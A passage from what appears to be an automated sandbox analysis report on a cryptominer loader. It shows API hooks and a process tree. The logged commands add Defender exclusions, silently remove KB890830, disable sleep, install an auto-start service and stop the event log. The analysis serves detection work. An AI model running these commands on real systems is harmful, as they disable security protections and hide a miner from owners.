RtlGetNativeSystemInformation    INLINE      explorer.exe, winlogon.exe
NtQueryDirectoryFileEx           INLINE      explorer.exe, winlogon.exe
NtEnumerateValueKey              INLINE      explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx           INLINE      explorer.exe, winlogon.exe
ZwQueryDirectoryFile             INLINE      explorer.exe, winlogon.exe

New Data is the byte sequence now found at each function entry. The report lists this table once per hooked process; the bytes are identical in explorer.exe and winlogon.exe, so it is shown once.

Function Name                    Hook Type   New Data
ZwEnumerateKey                   INLINE      0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation         INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread                   INLINE      0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile            INLINE      0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile            INLINE      0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey                   INLINE      0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile             INLINE      0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey              INLINE      0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation         INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread                   INLINE      0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation    INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx           INLINE      0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey              INLINE      0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx           INLINE      0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile             INLINE      0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                      Target ID:0
                                                      Start time:17:09:06
                                                      Start date:18/10/2024
                                                      Path:C:\Users\user\Desktop\loader.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\loader.exe"
                                                      Imagebase:0x7ff74aa00000
                                                      File size:5'502'728 bytes
                                                      MD5 hash:CDABDC02374167CCD4938E9FE8C31789
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:1
                                                      Start time:17:09:07
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                      Imagebase:0x7ff788560000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:17:09:07
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:17:09:12
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff64d3d0000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:17:09:12
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                      Imagebase:0x7ff756950000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:17:09:12
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:17:09:12
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                      Imagebase:0x7ff756950000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:17:09:12
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                      Imagebase:0x7ff756950000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:17:09:12
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:10
                                                      Start time:17:09:12
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                      Imagebase:0x7ff756950000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:11
                                                      Start time:17:09:13
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\dialer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\dialer.exe
                                                      Imagebase:0x7ff6480d0000
                                                      File size:39'936 bytes
                                                      MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:12
                                                      Start time:17:09:13
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:13
                                                      Start time:17:09:13
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:14
                                                      Start time:17:09:13
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:15
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe delete "NUTGFFPE"
                                                      Imagebase:0x7ff730450000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:16
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:17
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\wusa.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff7494f0000
                                                      File size:345'088 bytes
                                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:18
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe create "NUTGFFPE" binpath= "C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe" start= "auto"
                                                      Imagebase:0x7ff730450000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:19
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:20
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\winlogon.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:winlogon.exe
                                                      Imagebase:0x7ff7cd660000
                                                      File size:906'240 bytes
                                                      MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:21
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                      Imagebase:0x7ff730450000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:22
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe start "NUTGFFPE"
                                                      Imagebase:0x7ff730450000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:23
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:24
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:25
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe
                                                      Imagebase:0x7ff67ba50000
                                                      File size:5'502'728 bytes
                                                      MD5 hash:CDABDC02374167CCD4938E9FE8C31789
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 63%, ReversingLabs
                                                      Has exited:true

                                                      Target ID:26
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\lsass.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\lsass.exe
                                                      Imagebase:0x7ff7a2ae0000
                                                      File size:59'456 bytes
                                                      MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:27
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                      Imagebase:0x7ff788560000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:28
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:29
                                                      Start time:17:09:15
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:30
                                                      Start time:17:09:15
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\dwm.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"dwm.exe"
                                                      Imagebase:0x7ff74e710000
                                                      File size:94'720 bytes
                                                      MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:31
                                                      Start time:17:09:17
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff64d3d0000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:32
                                                      Start time:17:09:17
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                      Imagebase:0x7ff756950000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:33
                                                      Start time:17:09:17
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:34
                                                      Start time:17:09:17
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                      Imagebase:0x7ff756950000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:35
                                                      Start time:17:09:17
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:36
                                                      Start time:17:09:17
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                      Imagebase:0x7ff756950000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:37
                                                      Start time:17:09:17
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                      Imagebase:0x7ff756950000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:38
                                                      Start time:17:09:17
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:39
                                                      Start time:17:09:17
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\dialer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\dialer.exe
                                                      Imagebase:0x7ff6480d0000
                                                      File size:39'936 bytes
                                                      MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:40
                                                      Start time:17:09:17
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:41
                                                      Start time:17:09:17
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:42
                                                      Start time:17:09:18
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\dialer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\dialer.exe
                                                      Imagebase:0x7ff6480d0000
                                                      File size:39'936 bytes
                                                      MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:43
                                                      Start time:17:09:18
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\dialer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:dialer.exe
                                                      Imagebase:0x7ff6480d0000
                                                      File size:39'936 bytes
                                                      MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002B.00000002.3126900800.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000002B.00000002.3126900800.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                      Has exited:false

                                                      Target ID:44
                                                      Start time:17:09:19
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\wusa.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff7494f0000
                                                      File size:345'088 bytes
                                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:45
                                                      Start time:17:09:19
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:46
                                                      Start time:17:09:20
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:47
                                                      Start time:17:09:20
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:50
                                                      Start time:17:09:20
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:51
                                                      Start time:17:09:20
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:53
                                                      Start time:17:09:23
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:54
                                                      Start time:17:09:23
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:55
                                                      Start time:17:09:25
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:56
                                                      Start time:17:09:26
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:57
                                                      Start time:17:09:27
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:58
                                                      Start time:17:09:27
